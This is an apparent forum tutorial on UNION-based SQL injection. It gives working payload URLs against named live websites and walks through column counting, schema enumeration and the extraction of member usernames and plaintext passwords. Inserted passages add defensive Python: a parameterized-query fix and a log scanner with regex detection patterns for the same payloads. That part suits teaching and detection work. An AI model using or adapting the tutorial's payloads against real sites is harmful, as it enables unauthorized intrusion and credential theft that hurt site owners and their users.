sql injection tutorial with examples
SQL INJECTION:
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user
input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.
It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.
Imagine that you found this site:
http://www.guitarists.net/
First of all, we need to find a URL with a parameter like this to test for SQL injection:
id=xyz
Okay suppose we are going with this url
http://www.guitarists.net/links/list.php?id=253
To test whether list.php handles its id variable badly, we append a simple single quote ' to the URL and see whether it gives us an error like this:
http://www.guitarists.net/links/list.php?id=253'
Error:
Fatal error: Call to undefined method DB_Error::numRows() in /home/gnet/public_html/links/list.php on line 57
Now we will explore it.
The first step of all is to find out how many columns the query has; once we hit the correct number of columns, we'll see something different.
Code:
-1+union+select+
This is the basic syntax for this example of attack; of course it can be done differently, but I find this the easiest way to start.
Keep adding numbers to guess the correct number of columns, like this:
http://www.guitarists.net/links/list.php?id=-1+union+select+0-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2,3-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2,3,4-- [(:]
Here we beat the SQL error and found that the web page has 4 columns!
The number 1 also appears on the page, so we know that column 1 is vulnerable, and it is through it that we are going to steal information.
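As an added example (not from the original post), here is the kind of code behind a badly handled id parameter, beside two fixes, run against a constructed SQLite database standing in for the site's tables. The links table with five selected columns, the members table and the row contents are assumptions, and SQLite's || and a literal ':' replace MySQL's concat() and 0x3a in the payload.

```python
import sqlite3

# SQLite spelling of the post's final payload; MySQL's concat()/0x3a are not
# SQLite functions, so string concatenation is written with || here.
PAYLOAD = "-1 union select 0,strUsername||':'||strPassword,2,3,4 from members--"

def build_db() -> sqlite3.Connection:
    # Constructed stand-in for the post's links table (5 selected columns)
    # and its members table with the column names the post recovers.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE links(id INTEGER, title TEXT, url TEXT, descr TEXT, hits INTEGER);
        INSERT INTO links VALUES (253, 'Guitar tabs', 'http://example.invalid', 'tabs', 10);
        CREATE TABLE members(strUsername TEXT, strPassword TEXT);
        INSERT INTO members VALUES ('alice', 'hunter2');
    """)
    return con

def vulnerable_lookup(con, user_id: str) -> list:
    # The ?id= value is pasted into the SQL text, so "-1" empties the real
    # result, UNION appends attacker-chosen rows and "--" comments out the rest.
    sql = f"SELECT id, title, url, descr, hits FROM links WHERE id = {user_id}"
    return con.execute(sql).fetchall()

def bound_lookup(con, user_id) -> list:
    # Fix 1: bind the value. The driver sends it as data, never as SQL text,
    # so the UNION payload is just a string that matches no id.
    sql = "SELECT id, title, url, descr, hits FROM links WHERE id = ?"
    return con.execute(sql, (user_id,)).fetchall()

def typed_lookup(con, user_id: str) -> list:
    # Fix 2: also enforce the type the post's definition calls out; a
    # non-integer id is rejected before any SQL runs, which is easy to log.
    try:
        id_int = int(user_id)
    except ValueError:
        raise ValueError(f"rejected non-integer id: {user_id!r}") from None
    return bound_lookup(con, id_int)
```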
So now we know we have 4 columns and column 1 is vulnerable, and we will use information_schema.tables:
table_name & information_schema.tables--
This helps us find the table names. Now our link would look like this:
http://www.guitarists.net/links/list.php?id=-1+union+select+0,table_name,2,3,4+from+information_schema.tables--
Here we have replaced the vulnerable column 1 in the string with table_name.
Note: Here you can see all the tables at once, but that does not always happen; on certain websites we have to see them one by one, and for that you use the term +limit+*,1--
Like:
http://www.henleystandard.co.uk/news/news.php?id=-1+union+select+1,2,3,4,5,6,table_name,8,9,10+from+information_schema.tables+limit+0,1--
...
Well, continuing with our website...
http://www.guitarists.net/links/list.php?id=-1+union+select+0,table_name,2,3,4+from+information_schema.tables--
As we can see there are a lot of tables, but no doubt the one we want is the table members! We have to steal data from tables like members, admin, administrators etc.
As we can see there is no table like administrator or admin, so now we will explore members and check what info it has.
Now we need to see the columns that the table has, and for that we use the syntax:
column_name &
information_schema.columns
And our URL will look like this:
http://www.guitarists.net/links/list.php?id=-1+union+select+0,column_name,2,3,4+from+information_schema.columns+where+table_name=char(109,101,109,98,101,114,115)--
Don't be confused, I'm going to explain it now :-j
+where ---> the WHERE clause
+table_name= ---> the name of the table
char() ---> the name of the table written as ASCII codes
e.g.:
Code:
m = 109
e = 101
m = 109
b = 98
e = 101
r = 114
s = 115
Google "ASCII table" and you will get the whole table.
Well, now let's find out what we see in
http://www.guitarists.net/links/list.php?id=-1+union+select+0,column_name,2,3,4+from+information_schema.columns+where+table_name=char(109,101,109,98,101,114,115)--
w0w, we succeeded in grabbing the required info.
Cheers!!
Well, what interests us are the columns that hold the login and the password.
Well, now we make the final injection, to steal the login and password data.
The injection is made in the following way:
To see Login:
http://www.guitarists.net/links/list.php?id=-1+union+select+0,strUsername,2,3,4+from+members--
To see Passwords:
http://www.guitarists.net/links/list.php?id=-1+union+select+0,strPassword,2,3,4+from+members--
There is a much simpler method, which is to see everything at the same time using the syntax concat( ).
concat serves to join everything together at once, so our URL would be like this:
http://www.guitarists.net/links/list.php?id=-1+union+select+0,concat(strUsername,0x3a,strPassword),2,3,4+from+members--
0x3a -> hexadecimal code for the character :, used to insert a : between the username and the password so that the two are not confused.
All passwords are stored in plain text, not hashed!
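On the defensive side, an added example (not from the original post) of a small access-log scanner that flags the probing shown in this tutorial: the quote test, UNION column counting, information_schema enumeration, char() encoding and concat() extraction. The log lines are constructed to mirror the post's URLs, and the scanner also handles percent-encoded and double-encoded variants, which the post does not cover.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# (signal name, pattern) pairs run over each decoded, lower-cased parameter value.
SIGNALS = [
    ("union_select", re.compile(r"\bunion(?:\s|/\*.*?\*/)+(?:all\s+)?select\b")),
    ("schema_enum", re.compile(r"\binformation_schema\.(?:tables|columns)\b")),
    ("char_encoding", re.compile(r"\bchar\(\s*\d+(?:\s*,\s*\d+)*\s*\)")),
    ("concat_exfil", re.compile(r"\bconcat\(")),
    ("comment_tail", re.compile(r"(?:--|#|/\*)\s*$")),
    ("dangling_quote", re.compile(r"^[^']*'[^']*$")),
]

def decode_param(raw: str) -> str:
    # '+' and %xx decoded twice to catch double encoding (the post's URLs use
    # '+' for spaces), then whitespace collapsed so "union   select" still matches.
    val = unquote_plus(unquote_plus(raw))
    return re.sub(r"\s+", " ", val).strip().lower()

def scan_request_line(line: str) -> dict:
    """Map each query parameter that trips a rule to the list of rule names.
    A plain numeric id like the post's ?id=253 yields no findings."""
    m = re.match(r'(?:\S+\s+\S+\s+\S+\s+\[[^\]]*\]\s+)?"?(?:GET|POST)\s+(\S+)', line)
    if not m:
        return {}
    findings = {}
    for pair in urlsplit(m.group(1)).query.split("&"):
        name, _, raw = pair.partition("=")  # split on the first '=' only
        hits = [sig for sig, rx in SIGNALS if rx.search(decode_param(raw))]
        if hits:
            findings[name] = hits
    return findings

# Constructed log lines that mirror the post's URLs (path and parameter as in the post).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2020:10:00:00 +0000] "GET /links/list.php?id=253 HTTP/1.1" 200 4120',
    '203.0.113.7 - - [01/Jan/2020:10:00:05 +0000] "GET /links/list.php?id=253\' HTTP/1.1" 500 310',
    '203.0.113.7 - - [01/Jan/2020:10:00:40 +0000] "GET /links/list.php?id=-1+union+select+0,table_name,2,3,4+from+information_schema.tables-- HTTP/1.1" 200 9800',
    '203.0.113.7 - - [01/Jan/2020:10:01:12 +0000] "GET /links/list.php?id=-1+union+select+0,column_name,2,3,4+from+information_schema.columns+where+table_name=char(109,101,109,98,101,114,115)-- HTTP/1.1" 200 5100',
    '203.0.113.7 - - [01/Jan/2020:10:02:03 +0000] "GET /links/list.php?id=-1+union+select+0,concat(strUsername,0x3a,strPassword),2,3,4+from+members-- HTTP/1.1" 200 7700',
]

def scan_log(lines):
    # Returns [(line index, findings)] for the lines worth an alert.
    out = []
    for i, line in enumerate(lines):
        f = scan_request_line(line)
        if f:
            out.append((i, f))
    return out
```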
I hope this tutorial helps you learn SQL injection and understand the different techniques related to it.
This tutorial is written for educational purposes; I am not responsible if anyone uses it for illegal purposes.